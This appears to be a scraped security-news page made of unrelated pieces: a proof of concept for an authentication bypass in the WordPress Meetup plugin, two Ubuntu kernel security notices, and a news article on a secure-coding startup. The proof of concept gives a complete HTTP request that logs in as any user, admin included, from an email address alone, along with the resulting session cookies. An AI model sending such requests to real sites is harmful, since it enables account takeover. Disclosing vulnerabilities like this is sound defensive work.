    # CVE-2024-50483Meetup <= 0.1 - Authentication Bypass via Account Takeover# Description:The Meetup plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the facebook_register() function. This makes it possible for unauthenticated attackers to log in as any user, granted they know their email address.```CVE: CVE-2024-50483CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS Score: 9.8Slugs: meetup```Note: You need to know the users email address you want to login as.POC---```POST /wp-admin/admin-ajax.php HTTP/1.1Host: kubernetes.docker.internalContent-Type: application/x-www-form-urlencodedContent-Length: 149action=meetup_fb_register&email=admin@admin.com&first_name=Test&last_name=User&id=12345678901234567890&type=token&link=https://example.com/user/test/```Response--```HTTP/1.1 200 OKDate: Tue, 05 Nov 2024 21:37:23 GMTServer: Apache/2.4.57 (Debian)X-Powered-By: PHP/8.2.13X-Robots-Tag: noindexX-Content-Type-Options: nosniffExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Referrer-Policy: strict-origin-when-cross-originX-Frame-Options: SAMEORIGINSet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnlySet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnlySet-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnlyContent-Length: 0Content-Type: text/html; charset=UTF-8```

WordPress Meetup 0.1 Authentication Bypass

Ubuntu Security Notice 7095-1 - Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7095-1November 07, 2024linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-nvidia: Linux kernel for NVIDIA systems- linux-nvidia-lowlatency: Linux low latency kernel for NVIDIA systems- linux-nvidia-6.8: Linux kernel for NVIDIA systemsDetails:Chenyuan Yang discovered that the USB Gadget subsystem in the Linuxkernel did not properly check for the device to be enabled beforewriting. A local attacker could possibly use this to cause a denial ofservice. (CVE-2024-25741)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM32 architecture;  - MIPS architecture;  - PA-RISC architecture;  - PowerPC architecture;  - RISC-V architecture;  - S390 architecture;  - x86 architecture;  - Cryptographic API;  - Serial ATA and Parallel ATA drivers;  - Null block device driver;  - Bluetooth drivers;  - Cdrom driver;  - Clock framework and drivers;  - Hardware crypto device drivers;  - CXL (Compute Express Link) drivers;  - Cirrus firmware drivers;  - GPIO subsystem;  - GPU drivers;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - Fastrpc Driver;  - Network drivers;  - Microsoft Azure Network Adapter (MANA) driver;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - NVMEM (Non Volatile Memory) drivers;  - PCI subsystem;  - Pin controllers subsystem;  - x86 platform drivers;  - S/390 drivers;  - SCSI drivers;  - Thermal drivers;  - TTY drivers;  - UFS subsystem;  - USB DSL drivers;  - USB core drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Serial drivers;  - VFIO drivers;  - VHOST drivers;  - File systems infrastructure;  - BTRFS file system;  - GFS2 file system;  - JFFS2 file system;  - JFS file system;  - Network file systems library;  - Network file system client;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Memory management;  - Netfilter;  - Tracing infrastructure;  - io_uring subsystem;  - BPF subsystem;  - Core kernel;  - Bluetooth subsystem;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - Network traffic control;  - Sun RPC protocol;  - Wireless networking;  - AMD SoC Alsa drivers;  - SoC Audio for Freescale CPUs drivers;  - MediaTek ASoC drivers;  - SoC audio core drivers;  - SOF drivers;  - Sound sequencer drivers;(CVE-2024-42271, CVE-2024-42068, CVE-2024-42086, CVE-2024-42132,CVE-2024-42074, CVE-2024-41017, CVE-2024-42090, CVE-2024-42280,CVE-2024-41030, CVE-2024-41037, CVE-2024-42248, CVE-2024-42084,CVE-2024-41057, CVE-2024-42252, CVE-2024-41055, CVE-2024-42158,CVE-2024-42097, CVE-2024-42101, CVE-2024-42095, CVE-2024-41084,CVE-2024-41051, CVE-2024-41032, CVE-2024-41046, CVE-2024-42231,CVE-2024-42133, CVE-2024-42089, CVE-2024-41062, CVE-2024-41033,CVE-2024-41012, CVE-2024-41077, CVE-2024-41064, CVE-2024-41082,CVE-2024-41090, CVE-2024-42065, CVE-2024-41096, CVE-2024-42119,CVE-2024-41054, CVE-2024-42064, CVE-2024-42253, CVE-2024-42237,CVE-2024-42120, CVE-2024-41066, CVE-2024-41083, CVE-2024-42129,CVE-2024-41085, CVE-2024-41058, CVE-2024-42146, CVE-2024-42156,CVE-2024-42076, CVE-2024-42149, CVE-2024-42069, CVE-2024-41039,CVE-2024-42110, CVE-2024-42150, CVE-2024-41015, CVE-2024-39486,CVE-2024-42144, CVE-2024-42131, CVE-2024-42087, CVE-2024-42091,CVE-2024-42236, CVE-2024-42088, CVE-2024-42112, CVE-2024-42142,CVE-2024-42082, CVE-2024-42111, CVE-2024-41028, CVE-2024-45001,CVE-2024-42077, CVE-2024-42102, CVE-2024-42239, CVE-2024-42140,CVE-2024-41091, CVE-2024-41050, CVE-2024-41034, CVE-2024-43858,CVE-2024-42145, CVE-2024-42227, CVE-2024-41029, CVE-2024-42230,CVE-2024-42096, CVE-2024-42238, CVE-2024-41027, CVE-2024-42063,CVE-2024-41023, CVE-2024-41041, CVE-2024-41038, CVE-2024-41073,CVE-2024-41067, CVE-2024-41025, CVE-2024-42152, CVE-2024-42247,CVE-2024-41065, CVE-2024-42121, CVE-2024-42157, CVE-2024-42080,CVE-2024-41076, CVE-2024-41059, CVE-2024-42108, CVE-2024-42251,CVE-2024-42093, CVE-2024-42130, CVE-2024-42126, CVE-2024-42079,CVE-2024-42246, CVE-2024-41081, CVE-2024-42092, CVE-2024-43855,CVE-2024-42235, CVE-2024-42118, CVE-2024-42067, CVE-2024-41047,CVE-2024-42155, CVE-2024-41010, CVE-2024-41061, CVE-2024-41007,CVE-2024-42245, CVE-2024-42106, CVE-2024-42066, CVE-2024-41078,CVE-2024-42113, CVE-2024-41087, CVE-2024-41092, CVE-2024-42234,CVE-2024-42124, CVE-2024-42100, CVE-2024-42128, CVE-2024-41072,CVE-2024-41022, CVE-2024-41049, CVE-2024-42229, CVE-2024-42225,CVE-2024-41052, CVE-2024-42151, CVE-2024-41094, CVE-2024-41098,CVE-2024-41035, CVE-2024-41042, CVE-2024-42114, CVE-2024-42250,CVE-2024-41095, CVE-2024-42138, CVE-2024-42241, CVE-2024-42103,CVE-2024-42094, CVE-2024-41045, CVE-2024-41075, CVE-2024-42073,CVE-2024-42153, CVE-2024-41048, CVE-2024-42085, CVE-2024-41074,CVE-2024-42244, CVE-2024-41018, CVE-2024-41079, CVE-2024-42127,CVE-2023-52887, CVE-2023-52888, CVE-2024-41071, CVE-2024-41020,CVE-2024-41036, CVE-2024-42117, CVE-2024-41068, CVE-2024-41056,CVE-2024-39487, CVE-2024-42243, CVE-2024-41019, CVE-2024-41070,CVE-2024-41044, CVE-2024-41060, CVE-2024-41088, CVE-2024-41021,CVE-2024-41053, CVE-2024-42137, CVE-2024-41086, CVE-2024-42104,CVE-2024-42109, CVE-2024-42105, CVE-2024-42136, CVE-2024-41080,CVE-2024-42098, CVE-2024-41093, CVE-2024-41063, CVE-2024-42161,CVE-2024-42147, CVE-2024-42223, CVE-2024-41097, CVE-2024-41069,CVE-2024-42240, CVE-2024-42135, CVE-2024-42070, CVE-2024-41089,CVE-2024-42141, CVE-2024-42115, CVE-2024-41031, CVE-2024-42232)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1017-nvidia   6.8.0-1017.19  linux-image-6.8.0-1017-nvidia-64k  6.8.0-1017.19  linux-image-6.8.0-1017-nvidia-lowlatency  6.8.0-1017.19.1  linux-image-6.8.0-1017-nvidia-lowlatency-64k  6.8.0-1017.19.1  linux-image-nvidia              6.8.0-1017.19  linux-image-nvidia-64k          6.8.0-1017.19  linux-image-nvidia-lowlatency   6.8.0-1017.19.1  linux-image-nvidia-lowlatency-64k  6.8.0-1017.19.1Ubuntu 22.04 LTS  linux-image-6.8.0-1017-nvidia   6.8.0-1017.19~22.04.1  linux-image-6.8.0-1017-nvidia-64k  6.8.0-1017.19~22.04.1  linux-image-nvidia-6.8          6.8.0-1017.19~22.04.1  linux-image-nvidia-64k-6.8      6.8.0-1017.19~22.04.1  linux-image-nvidia-64k-hwe-22.04  6.8.0-1017.19~22.04.1  linux-image-nvidia-hwe-22.04    6.8.0-1017.19~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7095-1  CVE-2023-52887, CVE-2023-52888, CVE-2024-25741, CVE-2024-39486,  CVE-2024-39487, CVE-2024-41007, CVE-2024-41010, CVE-2024-41012,  CVE-2024-41015, CVE-2024-41017, CVE-2024-41018, CVE-2024-41019,  CVE-2024-41020, CVE-2024-41021, CVE-2024-41022, CVE-2024-41023,  CVE-2024-41025, CVE-2024-41027, CVE-2024-41028, CVE-2024-41029,  CVE-2024-41030, CVE-2024-41031, CVE-2024-41032, CVE-2024-41033,  CVE-2024-41034, CVE-2024-41035, CVE-2024-41036, CVE-2024-41037,  CVE-2024-41038, CVE-2024-41039, CVE-2024-41041, CVE-2024-41042,  CVE-2024-41044, CVE-2024-41045, CVE-2024-41046, CVE-2024-41047,  CVE-2024-41048, CVE-2024-41049, CVE-2024-41050, CVE-2024-41051,  CVE-2024-41052, CVE-2024-41053, CVE-2024-41054, CVE-2024-41055,  CVE-2024-41056, CVE-2024-41057, CVE-2024-41058, CVE-2024-41059,  CVE-2024-41060, CVE-2024-41061, CVE-2024-41062, CVE-2024-41063,  CVE-2024-41064, CVE-2024-41065, CVE-2024-41066, CVE-2024-41067,  CVE-2024-41068, CVE-2024-41069, CVE-2024-41070, CVE-2024-41071,  CVE-2024-41072, CVE-2024-41073, CVE-2024-41074, CVE-2024-41075,  CVE-2024-41076, CVE-2024-41077, CVE-2024-41078, CVE-2024-41079,  CVE-2024-41080, CVE-2024-41081, CVE-2024-41082, CVE-2024-41083,  CVE-2024-41084, CVE-2024-41085, CVE-2024-41086, CVE-2024-41087,  CVE-2024-41088, CVE-2024-41089, CVE-2024-41090, CVE-2024-41091,  CVE-2024-41092, CVE-2024-41093, CVE-2024-41094, CVE-2024-41095,  CVE-2024-41096, CVE-2024-41097, CVE-2024-41098, CVE-2024-42063,  CVE-2024-42064, CVE-2024-42065, CVE-2024-42066, CVE-2024-42067,  CVE-2024-42068, CVE-2024-42069, CVE-2024-42070, CVE-2024-42073,  CVE-2024-42074, CVE-2024-42076, CVE-2024-42077, CVE-2024-42079,  CVE-2024-42080, CVE-2024-42082, CVE-2024-42084, CVE-2024-42085,  CVE-2024-42086, CVE-2024-42087, CVE-2024-42088, CVE-2024-42089,  CVE-2024-42090, CVE-2024-42091, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42095, CVE-2024-42096, CVE-2024-42097,  CVE-2024-42098, CVE-2024-42100, CVE-2024-42101, CVE-2024-42102,  CVE-2024-42103, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42108, CVE-2024-42109, CVE-2024-42110, CVE-2024-42111,  CVE-2024-42112, CVE-2024-42113, CVE-2024-42114, CVE-2024-42115,  CVE-2024-42117, CVE-2024-42118, CVE-2024-42119, CVE-2024-42120,  CVE-2024-42121, CVE-2024-42124, CVE-2024-42126, CVE-2024-42127,  CVE-2024-42128, CVE-2024-42129, CVE-2024-42130, CVE-2024-42131,  CVE-2024-42132, CVE-2024-42133, CVE-2024-42135, CVE-2024-42136,  CVE-2024-42137, CVE-2024-42138, CVE-2024-42140, CVE-2024-42141,  CVE-2024-42142, CVE-2024-42144, CVE-2024-42145, CVE-2024-42146,  CVE-2024-42147, CVE-2024-42149, CVE-2024-42150, CVE-2024-42151,  CVE-2024-42152, CVE-2024-42153, CVE-2024-42155, CVE-2024-42156,  CVE-2024-42157, CVE-2024-42158, CVE-2024-42161, CVE-2024-42223,  CVE-2024-42225, CVE-2024-42227, CVE-2024-42229, CVE-2024-42230,  CVE-2024-42231, CVE-2024-42232, CVE-2024-42234, CVE-2024-42235,  CVE-2024-42236, CVE-2024-42237, CVE-2024-42238, CVE-2024-42239,  CVE-2024-42240, CVE-2024-42241, CVE-2024-42243, CVE-2024-42244,  CVE-2024-42245, CVE-2024-42246, CVE-2024-42247, CVE-2024-42248,  CVE-2024-42250, CVE-2024-42251, CVE-2024-42252, CVE-2024-42253,  CVE-2024-42271, CVE-2024-42280, CVE-2024-43855, CVE-2024-43858,  CVE-2024-45001Package Information:  https://launchpad.net/ubuntu/+source/linux-nvidia/6.8.0-1017.19  https://launchpad.net/ubuntu/+source/linux-nvidia-lowlatency/6.8.0-1017.19.1  https://launchpad.net/ubuntu/+source/linux-nvidia-6.8/6.8.0-1017.19~22.04.1

Ubuntu Security Notice USN-7095-1

Ubuntu Security Notice 7089-3 - Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7089-3November 07, 2024linux-aws, linux-aws-6.8, linux-oracle, linux-oracle-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-6.8: Linux kernel for Amazon Web Services (AWS) systems- linux-oracle-6.8: Linux kernel for Oracle Cloud systemsDetails:Chenyuan Yang discovered that the USB Gadget subsystem in the Linuxkernel did not properly check for the device to be enabled beforewriting. A local attacker could possibly use this to cause a denial ofservice. (CVE-2024-25741)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM32 architecture;  - MIPS architecture;  - PA-RISC architecture;  - PowerPC architecture;  - RISC-V architecture;  - S390 architecture;  - x86 architecture;  - Cryptographic API;  - Serial ATA and Parallel ATA drivers;  - Null block device driver;  - Bluetooth drivers;  - Cdrom driver;  - Clock framework and drivers;  - Hardware crypto device drivers;  - CXL (Compute Express Link) drivers;  - Cirrus firmware drivers;  - GPIO subsystem;  - GPU drivers;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - Fastrpc Driver;  - Network drivers;  - Microsoft Azure Network Adapter (MANA) driver;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - NVMEM (Non Volatile Memory) drivers;  - PCI subsystem;  - Pin controllers subsystem;  - x86 platform drivers;  - S/390 drivers;  - SCSI drivers;  - Thermal drivers;  - TTY drivers;  - UFS subsystem;  - USB DSL drivers;  - USB core drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Serial drivers;  - VFIO drivers;  - VHOST drivers;  - File systems infrastructure;  - BTRFS file system;  - GFS2 file system;  - JFFS2 file system;  - JFS file system;  - Network file systems library;  - Network file system client;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Memory management;  - Netfilter;  - Tracing infrastructure;  - io_uring subsystem;  - BPF subsystem;  - Core kernel;  - Bluetooth subsystem;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - Network traffic control;  - Sun RPC protocol;  - Wireless networking;  - AMD SoC Alsa drivers;  - SoC Audio for Freescale CPUs drivers;  - MediaTek ASoC drivers;  - SoC audio core drivers;  - SOF drivers;  - Sound sequencer drivers;(CVE-2024-42239, CVE-2024-42079, CVE-2024-41080, CVE-2024-42064,CVE-2024-42127, CVE-2024-41049, CVE-2024-41086, CVE-2024-42142,CVE-2024-42244, CVE-2024-41060, CVE-2024-42131, CVE-2024-42085,CVE-2024-42246, CVE-2024-41062, CVE-2024-42115, CVE-2024-42234,CVE-2024-42080, CVE-2024-41095, CVE-2024-41063, CVE-2024-42227,CVE-2024-41089, CVE-2024-42133, CVE-2024-43858, CVE-2024-42135,CVE-2024-42113, CVE-2024-42120, CVE-2024-42149, CVE-2024-42132,CVE-2024-41038, CVE-2024-41069, CVE-2024-41090, CVE-2024-41059,CVE-2024-41028, CVE-2024-42126, CVE-2024-42121, CVE-2024-42155,CVE-2024-42110, CVE-2024-41021, CVE-2024-41044, CVE-2024-42098,CVE-2024-42235, CVE-2024-41083, CVE-2024-41065, CVE-2024-42094,CVE-2024-42229, CVE-2024-42240, CVE-2024-42225, CVE-2024-42230,CVE-2024-41088, CVE-2024-42073, CVE-2024-42145, CVE-2024-42076,CVE-2024-42087, CVE-2024-42241, CVE-2024-41019, CVE-2024-41052,CVE-2024-42093, CVE-2024-42063, CVE-2024-41039, CVE-2024-42106,CVE-2024-42108, CVE-2024-42237, CVE-2024-41048, CVE-2024-41033,CVE-2023-52888, CVE-2024-41096, CVE-2024-41032, CVE-2024-41091,CVE-2024-42238, CVE-2024-41056, CVE-2024-42091, CVE-2024-42088,CVE-2024-41047, CVE-2024-42271, CVE-2024-41064, CVE-2024-42223,CVE-2024-42129, CVE-2024-42102, CVE-2024-42146, CVE-2024-42138,CVE-2024-41079, CVE-2024-42232, CVE-2024-42112, CVE-2024-39487,CVE-2024-42245, CVE-2024-41093, CVE-2024-41066, CVE-2024-43855,CVE-2024-41055, CVE-2024-42100, CVE-2024-41053, CVE-2024-42069,CVE-2024-42252, CVE-2024-42243, CVE-2024-42124, CVE-2024-41054,CVE-2024-42151, CVE-2024-42118, CVE-2024-42251, CVE-2024-42137,CVE-2024-41071, CVE-2024-41010, CVE-2024-41087, CVE-2024-41050,CVE-2024-42068, CVE-2024-42158, CVE-2024-41075, CVE-2024-42141,CVE-2024-42236, CVE-2024-41068, CVE-2024-42157, CVE-2024-42140,CVE-2024-41058, CVE-2024-41076, CVE-2024-42097, CVE-2024-41029,CVE-2024-41097, CVE-2024-42109, CVE-2024-41051, CVE-2024-41061,CVE-2024-42156, CVE-2024-42101, CVE-2024-41031, CVE-2024-41017,CVE-2024-42247, CVE-2024-42128, CVE-2024-41085, CVE-2024-41072,CVE-2024-42248, CVE-2024-41045, CVE-2024-42104, CVE-2024-42253,CVE-2024-42117, CVE-2024-41078, CVE-2024-42130, CVE-2024-42090,CVE-2024-42280, CVE-2024-42250, CVE-2024-42231, CVE-2024-41042,CVE-2024-42077, CVE-2024-42153, CVE-2024-41015, CVE-2024-41035,CVE-2024-41082, CVE-2024-42114, CVE-2024-41007, CVE-2024-41073,CVE-2024-42161, CVE-2024-42082, CVE-2024-42150, CVE-2024-42111,CVE-2024-42086, CVE-2024-42095, CVE-2024-41025, CVE-2024-41081,CVE-2024-42105, CVE-2024-41027, CVE-2024-42089, CVE-2024-39486,CVE-2024-41084, CVE-2024-42092, CVE-2024-42152, CVE-2024-41022,CVE-2024-41077, CVE-2024-41098, CVE-2024-41023, CVE-2024-42066,CVE-2024-41034, CVE-2024-41037, CVE-2024-41046, CVE-2023-52887,CVE-2024-42147, CVE-2024-42065, CVE-2024-42096, CVE-2024-41018,CVE-2024-42067, CVE-2024-41041, CVE-2024-42103, CVE-2024-42084,CVE-2024-42074, CVE-2024-41094, CVE-2024-42119, CVE-2024-41012,CVE-2024-41020, CVE-2024-41074, CVE-2024-42144, CVE-2024-41067,CVE-2024-42070, CVE-2024-41057, CVE-2024-41036, CVE-2024-42136,CVE-2024-41030, CVE-2024-41070, CVE-2024-41092)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1015-oracle   6.8.0-1015.16  linux-image-6.8.0-1015-oracle-64k  6.8.0-1015.16  linux-image-6.8.0-1018-aws      6.8.0-1018.20  linux-image-aws                 6.8.0-1018.20  linux-image-oracle              6.8.0-1015.16  linux-image-oracle-64k          6.8.0-1015.16Ubuntu 22.04 LTS  linux-image-6.8.0-1015-oracle   6.8.0-1015.15~22.04.1  linux-image-6.8.0-1015-oracle-64k  6.8.0-1015.15~22.04.1  linux-image-6.8.0-1018-aws      6.8.0-1018.19~22.04.1  linux-image-aws                 6.8.0-1018.19~22.04.1  linux-image-oracle              6.8.0-1015.15~22.04.1  linux-image-oracle-64k          6.8.0-1015.15~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7089-3  https://ubuntu.com/security/notices/USN-7089-2  https://ubuntu.com/security/notices/USN-7089-1  CVE-2023-52887, CVE-2023-52888, CVE-2024-25741, CVE-2024-39486,  CVE-2024-39487, CVE-2024-41007, CVE-2024-41010, CVE-2024-41012,  CVE-2024-41015, CVE-2024-41017, CVE-2024-41018, CVE-2024-41019,  CVE-2024-41020, CVE-2024-41021, CVE-2024-41022, CVE-2024-41023,  CVE-2024-41025, CVE-2024-41027, CVE-2024-41028, CVE-2024-41029,  CVE-2024-41030, CVE-2024-41031, CVE-2024-41032, CVE-2024-41033,  CVE-2024-41034, CVE-2024-41035, CVE-2024-41036, CVE-2024-41037,  CVE-2024-41038, CVE-2024-41039, CVE-2024-41041, CVE-2024-41042,  CVE-2024-41044, CVE-2024-41045, CVE-2024-41046, CVE-2024-41047,  CVE-2024-41048, CVE-2024-41049, CVE-2024-41050, CVE-2024-41051,  CVE-2024-41052, CVE-2024-41053, CVE-2024-41054, CVE-2024-41055,  CVE-2024-41056, CVE-2024-41057, CVE-2024-41058, CVE-2024-41059,  CVE-2024-41060, CVE-2024-41061, CVE-2024-41062, CVE-2024-41063,  CVE-2024-41064, CVE-2024-41065, CVE-2024-41066, CVE-2024-41067,  CVE-2024-41068, CVE-2024-41069, CVE-2024-41070, CVE-2024-41071,  CVE-2024-41072, CVE-2024-41073, CVE-2024-41074, CVE-2024-41075,  CVE-2024-41076, CVE-2024-41077, CVE-2024-41078, CVE-2024-41079,  CVE-2024-41080, CVE-2024-41081, CVE-2024-41082, CVE-2024-41083,  CVE-2024-41084, CVE-2024-41085, CVE-2024-41086, CVE-2024-41087,  CVE-2024-41088, CVE-2024-41089, CVE-2024-41090, CVE-2024-41091,  CVE-2024-41092, CVE-2024-41093, CVE-2024-41094, CVE-2024-41095,  CVE-2024-41096, CVE-2024-41097, CVE-2024-41098, CVE-2024-42063,  CVE-2024-42064, CVE-2024-42065, CVE-2024-42066, CVE-2024-42067,  CVE-2024-42068, CVE-2024-42069, CVE-2024-42070, CVE-2024-42073,  CVE-2024-42074, CVE-2024-42076, CVE-2024-42077, CVE-2024-42079,  CVE-2024-42080, CVE-2024-42082, CVE-2024-42084, CVE-2024-42085,  CVE-2024-42086, CVE-2024-42087, CVE-2024-42088, CVE-2024-42089,  CVE-2024-42090, CVE-2024-42091, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42095, CVE-2024-42096, CVE-2024-42097,  CVE-2024-42098, CVE-2024-42100, CVE-2024-42101, CVE-2024-42102,  CVE-2024-42103, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42108, CVE-2024-42109, CVE-2024-42110, CVE-2024-42111,  CVE-2024-42112, CVE-2024-42113, CVE-2024-42114, CVE-2024-42115,  CVE-2024-42117, CVE-2024-42118, CVE-2024-42119, CVE-2024-42120,  CVE-2024-42121, CVE-2024-42124, CVE-2024-42126, CVE-2024-42127,  CVE-2024-42128, CVE-2024-42129, CVE-2024-42130, CVE-2024-42131,  CVE-2024-42132, CVE-2024-42133, CVE-2024-42135, CVE-2024-42136,  CVE-2024-42137, CVE-2024-42138, CVE-2024-42140, CVE-2024-42141,  CVE-2024-42142, CVE-2024-42144, CVE-2024-42145, CVE-2024-42146,  CVE-2024-42147, CVE-2024-42149, CVE-2024-42150, CVE-2024-42151,  CVE-2024-42152, CVE-2024-42153, CVE-2024-42155, CVE-2024-42156,  CVE-2024-42157, CVE-2024-42158, CVE-2024-42161, CVE-2024-42223,  CVE-2024-42225, CVE-2024-42227, CVE-2024-42229, CVE-2024-42230,  CVE-2024-42231, CVE-2024-42232, CVE-2024-42234, CVE-2024-42235,  CVE-2024-42236, CVE-2024-42237, CVE-2024-42238, CVE-2024-42239,  CVE-2024-42240, CVE-2024-42241, CVE-2024-42243, CVE-2024-42244,  CVE-2024-42245, CVE-2024-42246, CVE-2024-42247, CVE-2024-42248,  CVE-2024-42250, CVE-2024-42251, CVE-2024-42252, CVE-2024-42253,  CVE-2024-42271, CVE-2024-42280, CVE-2024-43855, CVE-2024-43858Package Information:  https://launchpad.net/ubuntu/+source/linux-aws/6.8.0-1018.20  https://launchpad.net/ubuntu/+source/linux-oracle/6.8.0-1015.16  https://launchpad.net/ubuntu/+source/linux-aws-6.8/6.8.0-1018.19~22.04.1  https://launchpad.net/ubuntu/+source/linux-oracle-6.8/6.8.0-1015.15~22.04.1

Ubuntu Security Notice USN-7089-3

The company comes out of stealth with a tool that integrates directly into the developer's IDE to find flaws, offer remediation advice, and training materials to write secure code.

Source: Kirbyphoto via iStock Photo

The concept of shift left, or integrating security earlier in the software development life cycle, is important for application security, but it can be difficult to achieve. Developers need to take on some security responsibilities, but that means they need to be properly equipped with integrated security tools that fit their workflows.

This is the issue that Symbiotic Security, which launched this week, is tackling with its software-as-a-service platform, which integrates vulnerability detection and remediation capabilities directly into the application developer's integrated development environment (IDE). The platform also provides just-in-time training to developers so that they have the information on how to write secure code.

"Using Symbiotic is like having a personal security coach right next to you as you code," says Jerome Robert, co-founder and CEO of Symbiotic Security. "It provides real-time feedback on the security mistakes you're making, and it's training you so you don't repeat these mistakes."

The plug-in in the developer's IDE continuously scans code — as the developer types as well as the code that has already been written — and identifies potential security threats. The developer gets contextual remediation advice right in the IDE.

"Our security nudges are perceived as coaching," Robert says. "It's a tool that'll make them save time by not having to come back to fix old code."

Developers can also access the training materials — in the form of capture-the-flag (CTF) content — to learn what the problem is and why it is a problem. They see examples of secure and vulnerable code and are presented with a snippet of insecure code to find and fix as part of a game to help improve secure coding skills.

The difference between Symbiotic Security's plug-in and other code security tools is where the issues are identified, Robert says. Many of the others catch mistakes after the code has been written, often during code commits or when integrated with the rest of the build.

"Nobody feels bad making a few mistakes here and there in a draft, and that's the mental state we want developers to be when we advise them on security," Robert says. "If we were at commit \[or, more commonly, in the CI\], we'd be basically flagging issues after a developer said, 'This is my final release, this code is good to go.'"

As part of the launch, Symbiotic Security also raised $3 million in seed funding from investors including Lerer Hippeau, Axeleo Capital, and Factorial Capital. Symbiotic Security said its product is currently deployed at eight companies.

**About the Author**

As Dark Reading’s managing editor for features, Fahmida Y Rashid focuses on stories that provide security professionals with the information they need to do their jobs. She has spent over a decade analyzing news events and demystifying security technology for IT professionals and business managers. Prior to specializing in information security, Fahmida wrote about enterprise IT, especially networking, open source, and core internet infrastructure. Before becoming a journalist, she spent over 10 years as an IT professional -- and has experience as a network administrator, software developer, management consultant, and product manager. Her work has appeared in various business and test trade publications, including VentureBeat, CSO Online, InfoWorld, eWEEK, CRN, PC Magazine, and Tom’s Guide.

Tag

#perl